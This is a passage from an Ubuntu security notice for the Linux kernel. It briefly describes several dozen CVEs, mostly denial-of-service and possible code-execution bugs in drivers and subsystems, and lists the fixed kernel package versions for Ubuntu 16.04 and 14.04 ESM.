sensitive information. (CVE-2022-20132)

It was discovered that the device-mapper verity (dm-verity) driver in the  
Linux kernel did not properly verify targets being loaded into the device-  
mapper table. A privileged attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code. (CVE-2022-20572,  
CVE-2022-2503)

Duoming Zhou discovered that race conditions existed in the timer handling  
implementation of the Linux kernel's Rose X.25 protocol layer, resulting in  
use-after-free vulnerabilities. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-2318)

Zheyu Ma discovered that the Silicon Motion SM712 framebuffer driver in the  
Linux kernel did not properly handle very small reads. A local attacker  
could use this to cause a denial of service (system crash). (CVE-2022-2380)

David Leadbeater discovered that the netfilter IRC protocol tracking  
implementation in the Linux Kernel incorrectly handled certain message  
payloads in some situations. A remote attacker could possibly use this to  
cause a denial of service or bypass firewall filtering. (CVE-2022-2663)

Lucas Leong discovered that the LightNVM subsystem in the Linux kernel did  
not properly handle data lengths in certain situations. A privileged  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-2991)

It was discovered that the Intel 740 frame buffer driver in the Linux  
kernel contained a divide by zero vulnerability. A local attacker could use  
this to cause a denial of service (system crash). (CVE-2022-3061)

Jiasheng Jiang discovered that the wm8350 charger driver in the Linux  
kernel did not properly deallocate memory, leading to a null pointer  
dereference vulnerability. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-3111)

It was discovered that the sound subsystem in the Linux kernel contained a  
race condition in some situations. A local attacker could use this to cause  
a denial of service (system crash). (CVE-2022-3303)

It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux  
kernel did not properly perform bounds checking in some situations. A  
physically proximate attacker could use this to craft a malicious USB  
device that when inserted, could cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-3628)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

It was discovered that the NILFS2 file system implementation in the Linux  
kernel did not properly deallocate memory in certain error conditions. An  
attacker could use this to cause a denial of service (memory exhaustion).  
(CVE-2022-3646)

It was discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel contained a reference counting error. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2022-36879)

It was discovered that the infrared transceiver USB driver did not properly  
handle USB control messages. A local attacker with physical access could  
plug in a specially crafted USB device to cause a denial of service (memory  
exhaustion). (CVE-2022-3903)

Jann Horn discovered a race condition existed in the Linux kernel when  
unmapping VMAs in certain situations, resulting in possible use-after-free  
vulnerabilities. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2022-39188)

Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41218)

It was discovered that a race condition existed in the SMSC UFX USB driver  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41849)

It was discovered that a race condition existed in the Roccat HID driver in  
the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-41850)

It was discovered that the USB core subsystem in the Linux kernel did not  
properly handle nested reset events. A local attacker with physical access  
could plug in a specially crafted USB device to cause a denial of service  
(kernel deadlock). (CVE-2022-4662)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

It was discovered that a memory leak existed in the SCTP protocol  
implementation in the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2023-1074)

Mingi Cho discovered that the netfilter subsystem in the Linux kernel did  
not properly initialize a data structure, leading to a null pointer  
dereference vulnerability. An attacker could use this to cause a denial of  
service (system crash). (CVE-2023-1095)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

Lianhui Tang discovered that the MPLS implementation in the Linux kernel  
did not properly handle certain sysctl allocation failure conditions,  
leading to a double-free vulnerability. An attacker could use this to cause  
a denial of service or possibly execute arbitrary code. (CVE-2023-26545)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate attributes in certain situations, leading  
to an out-of-bounds read vulnerability. A local attacker could possibly use  
this to expose sensitive information (kernel memory). (CVE-2023-26607)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   linux-image-4.4.0-1118-kvm      4.4.0-1118.128  
   linux-image-4.4.0-239-generic   4.4.0-239.273  
   linux-image-4.4.0-239-lowlatency  4.4.0-239.273  
   linux-image-generic             4.4.0.239.245  
   linux-image-generic-lts-xenial  4.4.0.239.245  
   linux-image-kvm                 4.4.0.1118.115  
   linux-image-lowlatency          4.4.0.239.245  
   linux-image-lowlatency-lts-xenial  4.4.0.239.245  
   linux-image-virtual             4.4.0.239.245  
   linux-image-virtual-lts-xenial  4.4.0.239.245

Ubuntu 14.04 ESM:  
   linux-image-4.4.0-239-generic   4.4.0-239.273~14.04.1  
   linux-image-4.4.0-239-lowlatency  4.4.0-239.273~14.04.1  
   linux-image-generic-lts-xenial  4.4.0.239.207  
   linux-image-lowlatency-lts-xenial  4.4.0.239.207  
   linux-image-virtual-lts-xenial  4.4.0.239.207

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6014-1  
   CVE-2020-36516, CVE-2021-26401, CVE-2021-28711, CVE-2021-28712,  
   CVE-2021-28713, CVE-2021-3428, CVE-2021-3659, CVE-2021-3669,  
   CVE-2021-3732, CVE-2021-3772, CVE-2021-4149, CVE-2021-4203,  
   CVE-2021-45868, CVE-2022-0487, CVE-2022-0494, CVE-2022-0617,  
   CVE-2022-1016, CVE-2022-1195, CVE-2022-1205, CVE-2022-1462,  
   CVE-2022-1516, CVE-2022-1974, CVE-2022-1975, CVE-2022-20132,  
   CVE-2022-20572, CVE-2022-2318, CVE-2022-2380, CVE-2022-2503,  
   CVE-2022-2663, CVE-2022-2991, CVE-2022-3061, CVE-2022-3111,  
   CVE-2022-3303, CVE-2022-3628, CVE-2022-36280, CVE-2022-3646,  
   CVE-2022-36879, CVE-2022-3903, CVE-2022-39188, CVE-2022-41218,  
   CVE-2022-41849, CVE-2022-41850, CVE-2022-4662, CVE-2022-47929,  
   CVE-2023-0394, CVE-2023-1074, CVE-2023-1095, CVE-2023-1118,  
   CVE-2023-23455, CVE-2023-26545, CVE-2023-26607

Tag

#linux